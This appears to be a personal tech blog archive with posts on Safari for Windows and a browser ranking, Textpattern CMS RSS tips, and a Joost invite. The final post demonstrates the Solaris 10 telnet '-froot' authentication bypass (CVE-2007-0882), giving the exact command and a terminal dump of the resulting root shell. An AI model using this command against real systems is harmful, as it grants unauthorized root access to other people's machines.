Safari on Windows !

Safari for windows ! Well one more company realized the importance of web and launched windows version of their browser. I downloaded the browser few days back and it gave the same feeling I was having when I first ran AOE II in my GNU/Linux box using Wine. yea, that artificial look. I expected better experience from an Apple product. It also gives me the feel of good old phoenix (when FF was a sleek cut down version of mozilla). As Apple claims, its pretty stable and fast for a beta product. (Never crashed in last 1 week) Looks like its far better than Firefox in Memory usage.

Here is some Apple safari on windows XP screen shots:






I was wondering where safari will fall if I rate the browsers. That made me think about Firefox. Gone are the days when it was a sleek fast browser which was called a fast cut down version of Mozilla. With Google embrassing FF for their endless range of products and with crazy memory management, looks like FF has lost the charm it had. I remember myself searching for "light weight browser" or so in Google and ending up downloading phoenix for a GNU/Linux server in the college computer center. (Other options were dillo and w3m)

Why Google comes as the default option in Firefox's search box ?

I think in Phoenix it was dmoz.org

Why assortment of Google applications, say Google Gears supports only FF and IE and not Opera, Flock etc ?

Firefox is definetly not the best browser available. I think its Opera that deserves the best browsers crown. Then I like Flock too. It has a sleak interface and they way its integrated with flickr is pretty interesting. Oh! yea, in Flock Yahoo is the default search engine. :)

Finally lets list the browsers in the order of preference:

1. Opera : the only browser which gives importance to comply with standards and not to rely on 'monopoly'.
2. Seamonkey : Oh! yea Good old Mozilla / Netscape
3. Flock : not that bad
4. IE6 (I have tried IE7 and for me its damn slow !)
5. Firefox : much hyped !
6. Safari : sleek infant but definitely better than FF in memory management

(No, I haven't forgotten lynx. But I think there is no need to rate this tool ! isn't it ?)

Update: Phoenix is still available here :)

Textpattern : the CMS

I had choosed textpattern for the site GoWayanad.com after comparing various CMSes. I found that TXP aka textpattern to be pretty neat and light weight. It doesn't have all those flashy features other CMSes like Joomla offer. But since the site is going to static, I won't be needing all those flashy features. And ofcourse, as the number of lines of code increases the bugs also increases.

Anyway I had to burn high amounts of brain fuel to get used to Textpattern. Getting used to writing articles, the concept of presentation, content, forms etc were very confusing in the beginning.

Given below are few links which gave me the basic understanding of TXP

• TextPattern Semantics
• A very detailed diagram with the relationships by mattmoss

Then I noticed that Firefox is not auto detecting the RSS feed. How to make feed aggregators auto detect the textpattern RSS feed ? I googled and there were no proper results. anyway, I noted that the directive

<link rel="alternate" type="application/rss+xml" title="rss" 
href="http://gowayanad.com/index.php?rss=1" />

is missing in the 'head' section. Added it in the head section of the presentation > Pages I am using and it started working.

Helpful FAQ : http://textpattern.com/faq/280/troubleshooting-feed-issues

(I will keep updating this blog post with various tips and tricks regarding textpattern. )

i bend my knees infront of thee and beg for joost invite

Joost is a internet (P2P) TV application. Its a startup floated by the co-founders of Skype and kaaza. Following Gmail they are using "invitation only" marketing campaign.

And its very difficult to get an invite. Check the chat I had a with a friend ;-)

me: wats ur stat ? ( status in google talk) galexy: search joost me: hmmm invite undel thaaa ;-) ( translates to : please please give me an invite) i will try is it good ? galexy: NO WAY u have to go down on your knees and beg me: im doing it galexy: i am not seeing it :D desperate me: oh i bend my knees infront of thee and beg for joost. galexy: :) ok.. and u shall be called bandipur bayangaran poor me: as u wish ... any more wishes ? galexy: nope me: then u should act ... galexy: giving it

Finally I my dear friend 'galexy' [g :-) ] sends me a joost invite and I got the app downloaded. (There is a desktop client which will stream the media from the network. Sadly GNU/Linux is not supported!) But looks like they haven't added HTTP proxy support. Looks like its tricky to support proxies as the application uses P2P networks.

The error message I got was quite funny. It said: 'You seem to be connecting internet via something called a "proxy" '

(Well, I hope I could properly configure the NAT at my home and get rid of the Squid proxy - thanks to the sify internet connection(?) I am using)

Inbuilt vulnerabiliy support !

I have been thinking about starting a technical blog for quite sometime. And I am excited to start with writing about security. From the early days at college, I was told that getting root / administrator is the biggest thing a computer engineer can do and some of my friends were successful enough to crack a Novel Netware network and use it for getting some pr0n. Finally one hell of a anti-cracker caught them, 'disassembled and analysed' the whole .EXE file they used to crack the Novel Netware and suspended them from the lab. (The anti-cracker had used a tool called Turbo Disassembler to do the magic.) Now please don't ask me how he managed to do that. I am trying to figure out that for years and once I understand how to do that, I will go to Himalayas and spend rest of my life as a sadhu ! (some snaps) And then there was another guy who told me that copying and pasting the GNU/Linux boot messages to some file will solve all the X related issues in RedHat 7.0. (LOL ! I hope he will be reading this.)

Ok :-) Thats old story about getting root.

Recently I happened to check a Solaris 10 box. This version of operating system comes with an interesting zero-day bug.

Try "telnet -l '-froot' IP" and you can login to a Solaris 10 box without a password !

I know, no one is going to believe this. so I have added the screen dump below:


[~]$telnet -l '-froot' IP
Trying IP...
Connected to IP(IP).
Escape character is '^]'.
Last login: Wed Apr 19 00:28:17 from IP
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
You have new mail.
# bash


Ok, lets try a cat /etc/release

bash-3.00# cat /etc/re
reboot release remote
bash-3.00# cat /etc/release
Solaris 10 6/06 s10s_u2wos_09a SPARC
Copyright 2006 Sun Microsystems, Inc. All Rights Reserved.
Use is subject to license terms.
Assembled 09 June 2006


Still not convinced ?


bash-3.00# id
uid=0(root) gid=0(root)
bash-3.00#

Oh yea !!! You can login without a root password !

btw what is this '-f ' option ?

GNU/Linux man page says "If Kerberos V5 authentication is being used, the -f option allows the local credentials to be forwarded to the remote system."

Details: CVE-2007-0882 (the telnet "-froot" bug)

The Register has an article here

Sun has announced a workaround and a patch for it.